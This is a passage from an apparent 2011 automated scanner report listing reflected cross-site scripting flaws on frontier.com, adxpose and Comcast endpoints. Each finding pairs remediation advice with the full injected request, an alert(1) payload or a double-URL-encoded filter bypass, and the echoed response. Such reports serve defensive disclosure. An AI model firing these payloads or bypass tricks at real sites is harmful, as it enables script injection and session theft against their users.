GET /m2/comcastresidentialservices/mbox/standard?mboxHost=sitesearch.comcast.com&mboxSession=1315327839174-766376&mboxPage=1315329733349-634146&mboxCount=1&internalkeyword=xss&mbox=Search_Image_Promos819af<script>alert(1)</script>f8868cea7a0&mboxId=0&mboxTime=1315311733394&mboxURL=http%3A%2F%2Fsitesearch.comcast.com%2F%3Fq%3Dxss%26cat%3Dcom%26con%3Dwww%26sec%3D%26PageName%3DLooking%252Bfor%2BProducts%2Band%2BPrices%253F&mboxReferrer=&mboxVersion=38 HTTP/1.1 Host: comcastresidentialservices.tt.omtrdc.net Proxy-Connection: keep-alive Referer: http://sitesearch.comcast.com/?q=xss&cat=com&con=www&sec=&PageName=Looking%2Bfor+Products+and+Prices%3F User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]
Response
HTTP/1.1 200 OK Content-Type: text/javascript Content-Length: 215 Date: Tue, 06 Sep 2011 12:22:52 GMT Server: Test & Target
mboxFactories.get('default').get('Search_Image_Promos819af<script>alert(1)</script>f8868cea7a0',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1315327839174-766376.19");
2.23. http://event.adxpose.com/event.flow [uid parameter]
Summary
Severity: High
Confidence: Certain
Host: http://event.adxpose.com
Path: /event.flow
Issue detail
The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 18ccf<script>alert(1)</script>aa7f8549978 was submitted in the uid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fober.frontier%2Fproduct_undefined%3Bdc_seed%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D8383746361359954%3F&uid=TVYMYp4lQTRs9JsS_4098672818ccf<script>alert(1)</script>aa7f8549978&xy=0%2C0&wh=300%2C250&vchannel=41471866&cid=3941858&iad=1315331134985-48379358672536910&cookieenabled=1&screenwh=1920%2C1200&adwh=300%2C250&colordepth=16&flash=10.3&iframed=1 HTTP/1.1 Host: event.adxpose.com Proxy-Connection: keep-alive Referer: http://cdn.optmd.com/V2/80181/197812/index.html User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: evlu=ec39c893-8f48-41a8-9b1f-be5afaba100a
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=77EE7E015EE500AABD3FD55823F0F1DB; Path=/ Cache-Control: no-store Content-Type: text/javascript;charset=UTF-8 Content-Length: 147 Date: Tue, 06 Sep 2011 12:46:01 GMT
if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("TVYMYp4lQTRs9JsS_4098672818ccf<script>alert(1)</script>aa7f8549978");
2.24. http://frontier.com/AgentOrdering/CustomAppTabInfo/tabs.css [REST URL parameter 1]
Summary
Severity: High
Confidence: Certain
Host: http://frontier.com
Path: /AgentOrdering/CustomAppTabInfo/tabs.css
Issue detail
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 72d0c%2527%253balert%25281%2529%252f%252f8df9650bb55 was submitted in the REST URL parameter 1. This input was echoed as 72d0c';alert(1)//8df9650bb55 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /AgentOrdering72d0c%2527%253balert%25281%2529%252f%252f8df9650bb55/CustomAppTabInfo/tabs.css HTTP/1.1 Host: frontier.com Proxy-Connection: keep-alive Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8508CMWUL; ASP.NET_SessionId=obmtq3qrw5huoh3ltwzo40av
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 11:51:10 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 43755
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_ctl00_Head1">< ...[SNIP]... <![CDATA[ $('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/PageNotFound.aspx?404;http://frontier.com:80/AgentOrdering72d0c';alert(1)//8df9650bb55/CustomAppTabInfo/tabs.css');//]]> ...[SNIP]...
2.25. http://frontier.com/AgentOrdering/CustomAppTabInfo/tabs.css [REST URL parameter 2]
Summary
Severity: High
Confidence: Certain
Host: http://frontier.com
Path: /AgentOrdering/CustomAppTabInfo/tabs.css
Issue detail
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 246a3%2527%253balert%25281%2529%252f%252fe03a978b338 was submitted in the REST URL parameter 2. This input was echoed as 246a3';alert(1)//e03a978b338 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /AgentOrdering/CustomAppTabInfo246a3%2527%253balert%25281%2529%252f%252fe03a978b338/tabs.css HTTP/1.1 Host: frontier.com Proxy-Connection: keep-alive Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8508CMWUL; ASP.NET_SessionId=obmtq3qrw5huoh3ltwzo40av
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 11:51:20 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 43755
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_ctl00_Head1">< ...[SNIP]... <![CDATA[ $('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/PageNotFound.aspx?404;http://frontier.com:80/AgentOrdering/CustomAppTabInfo246a3';alert(1)//e03a978b338/tabs.css');//]]> ...[SNIP]...
2.26. http://frontier.com/AgentOrdering/CustomAppTabInfo/tabs.css [REST URL parameter 3]
Summary
Severity: High
Confidence: Certain
Host: http://frontier.com
Path: /AgentOrdering/CustomAppTabInfo/tabs.css
Issue detail
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1ac67%2527%253balert%25281%2529%252f%252f9c77ef6d725 was submitted in the REST URL parameter 3. This input was echoed as 1ac67';alert(1)//9c77ef6d725 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /AgentOrdering/CustomAppTabInfo/tabs.css1ac67%2527%253balert%25281%2529%252f%252f9c77ef6d725 HTTP/1.1 Host: frontier.com Proxy-Connection: keep-alive Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8508CMWUL; ASP.NET_SessionId=obmtq3qrw5huoh3ltwzo40av
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 11:51:30 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 43755
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_ctl00_Head1">< ...[SNIP]... <![CDATA[ $('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/PageNotFound.aspx?404;http://frontier.com:80/AgentOrdering/CustomAppTabInfo/tabs.css1ac67';alert(1)//9c77ef6d725');//]]> ...[SNIP]...
2.27. http://frontier.com/AgentOrdering/Login/ [REST URL parameter 1]
Summary
Severity: High
Confidence: Certain
Host: http://frontier.com
Path: /AgentOrdering/Login/
Issue detail
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aa607%2527%253balert%25281%2529%252f%252f787cb7d4dcb was submitted in the REST URL parameter 1. This input was echoed as aa607';alert(1)//787cb7d4dcb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /AgentOrderingaa607%2527%253balert%25281%2529%252f%252f787cb7d4dcb/Login/ HTTP/1.1 Host: frontier.com Proxy-Connection: keep-alive Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8508CMWUL; ASP.NET_SessionId=obmtq3qrw5huoh3ltwzo40av; CP=null*; s_cc=true; s_sq=cznfrontier%3D%2526pid%253DFrontier.com%252520%25253A%2525202011%252520Commercial%252520Summer%252520Offer%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Ffrontier.com%25252FAgentOrdering%25252FLogin%25252F%2526ot%253DA
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 12:30:14 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 43627
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_ctl00_Head1">< ...[SNIP]... <![CDATA[ $('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/PageNotFound.aspx?404;http://frontier.com:80/AgentOrderingaa607';alert(1)//787cb7d4dcb/Login/');//]]> ...[SNIP]...
2.28. http://frontier.com/AgentOrdering/Login/ [REST URL parameter 2]
Summary
Severity: High
Confidence: Certain
Host: http://frontier.com
Path: /AgentOrdering/Login/
Issue detail
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 44e10%2527%253balert%25281%2529%252f%252f43ea9213a24 was submitted in the REST URL parameter 2. This input was echoed as 44e10';alert(1)//43ea9213a24 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /AgentOrdering/Login44e10%2527%253balert%25281%2529%252f%252f43ea9213a24/ HTTP/1.1 Host: frontier.com Proxy-Connection: keep-alive Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8508CMWUL; ASP.NET_SessionId=obmtq3qrw5huoh3ltwzo40av; CP=null*; s_cc=true; s_sq=cznfrontier%3D%2526pid%253DFrontier.com%252520%25253A%2525202011%252520Commercial%252520Summer%252520Offer%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Ffrontier.com%25252FAgentOrdering%25252FLogin%25252F%2526ot%253DA
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 12:30:24 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 43627
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_ctl00_Head1">< ...[SNIP]... <![CDATA[ $('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/PageNotFound.aspx?404;http://frontier.com:80/AgentOrdering/Login44e10';alert(1)//43ea9213a24/');//]]> ...[SNIP]...
2.29. http://frontier.com/BillPay/Login.aspx [REST URL parameter 1]
Summary
Severity: High
Confidence: Firm
Host: http://frontier.com
Path: /BillPay/Login.aspx
Issue detail
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c8990'%3b3ad87ec9c52 was submitted in the REST URL parameter 1. This input was echoed as c8990';3ad87ec9c52 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /BillPayc8990'%3b3ad87ec9c52/Login.aspx HTTP/1.1 Host: frontier.com Proxy-Connection: keep-alive Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8508CMWUL; ASP.NET_SessionId=obmtq3qrw5huoh3ltwzo40av; CP=null*; s_cc=true; s_sq=%5B%5BB%5D%5D
Response (redirected)
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 12:30:00 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 43311
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_ctl00_Head1">< ...[SNIP]... <![CDATA[ $('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/PageNotFound.aspx?aspxerrorpath=/BillPayc8990';3ad87ec9c52/Login.aspx');//]]> ...[SNIP]...
2.30. http://frontier.com/BillPay/Login.aspx [REST URL parameter 2]
Summary
Severity: High
Confidence: Certain
Host: http://frontier.com
Path: /BillPay/Login.aspx
Issue detail
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3f062%2527%253balert%25281%2529%252f%252fa328f8cd333 was submitted in the REST URL parameter 2. This input was echoed as 3f062';alert(1)//a328f8cd333 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /BillPay/Login.aspx3f062%2527%253balert%25281%2529%252f%252fa328f8cd333 HTTP/1.1 Host: frontier.com Proxy-Connection: keep-alive Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8508CMWUL; ASP.NET_SessionId=obmtq3qrw5huoh3ltwzo40av; CP=null*; s_cc=true; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 12:30:13 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 43593
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_ctl00_Head1">< ...[SNIP]... <![CDATA[ $('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/PageNotFound.aspx?404;http://frontier.com:80/BillPay/Login.aspx3f062';alert(1)//a328f8cd333');//]]> ...[SNIP]...
2.31. http://frontier.com/Controls/SharedWebMethods.aspx/GetCurrentLocale [REST URL parameter 2]
Summary
Severity: High
Confidence: Certain
Host: http://frontier.com
Path: /Controls/SharedWebMethods.aspx/GetCurrentLocale
Issue detail
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b2a52%2527%253balert%25281%2529%252f%252f6141da654bb was submitted in the REST URL parameter 2. This input was echoed as b2a52';alert(1)//6141da654bb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
POST /Controls/SharedWebMethods.aspxb2a52%2527%253balert%25281%2529%252f%252f6141da654bb/GetCurrentLocale HTTP/1.1 Host: frontier.com Proxy-Connection: keep-alive Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110 Content-Length: 12 Origin: http://frontier.com X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Content-Type: application/json; charset=UTF-8 Accept: application/json, text/javascript, */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8508CMWUL; ASP.NET_SessionId=obmtq3qrw5huoh3ltwzo40av; CP=null*; s_cc=true; s_sq=%5B%5BB%5D%5D
{'href': ''}
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 11:51:24 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 43807
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_ctl00_Head1">< ...[SNIP]... <![CDATA[ $('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/PageNotFound.aspx?404;http://frontier.com:80/Controls/SharedWebMethods.aspxb2a52';alert(1)//6141da654bb/GetCurrentLocale');//]]> ...[SNIP]...
2.32. http://frontier.com/Controls/VirtualCode.ashx [REST URL parameter 1]
Summary
Severity: High
Confidence: Firm
Host: http://frontier.com
Path: /Controls/VirtualCode.ashx
Issue detail
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 56e88'%3b3d6207f3d2f was submitted in the REST URL parameter 1. This input was echoed as 56e88';3d6207f3d2f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Controls56e88'%3b3d6207f3d2f/VirtualCode.ashx?pageid=98&origPath=%2fftr.css%2f HTTP/1.1 Host: frontier.com Proxy-Connection: keep-alive Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8508CMWUL; ASP.NET_SessionId=obmtq3qrw5huoh3ltwzo40av
Response (redirected)
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 11:51:09 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 43355
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_ctl00_Head1">< ...[SNIP]... <![CDATA[ $('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/PageNotFound.aspx?aspxerrorpath=/Controls56e88';3d6207f3d2f/VirtualCode.ashx');//]]> ...[SNIP]...
2.33. http://frontier.com/Controls/VirtualCode.ashx [REST URL parameter 2]
Summary
Severity: High
Confidence: Certain
Host: http://frontier.com
Path: /Controls/VirtualCode.ashx
Issue detail
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 73438%2527%253balert%25281%2529%252f%252f0fdd979cf43 was submitted in the REST URL parameter 2. This input was echoed as 73438';alert(1)//0fdd979cf43 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /Controls/VirtualCode.ashx73438%2527%253balert%25281%2529%252f%252f0fdd979cf43?pageid=98&origPath=%2fftr.css%2f HTTP/1.1 Host: frontier.com Proxy-Connection: keep-alive Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8508CMWUL; ASP.NET_SessionId=obmtq3qrw5huoh3ltwzo40av
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 11:51:22 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 43927
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_ctl00_Head1">< ...[SNIP]... <![CDATA[ $('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/PageNotFound.aspx?404;http://frontier.com:80/Controls/VirtualCode.ashx73438';alert(1)//0fdd979cf43?pageid=98&origPath=/ftr.css/');//]]> ...[SNIP]...
2.34. http://frontier.com/Images/2011promo/bg-grey.jpg [REST URL parameter 1]
Summary
Severity: High
Confidence: Certain
Host: http://frontier.com
Path: /Images/2011promo/bg-grey.jpg
Issue detail
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7327a%2527%253balert%25281%2529%252f%252f2dd01931fc3 was submitted in the REST URL parameter 1. This input was echoed as 7327a';alert(1)//2dd01931fc3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
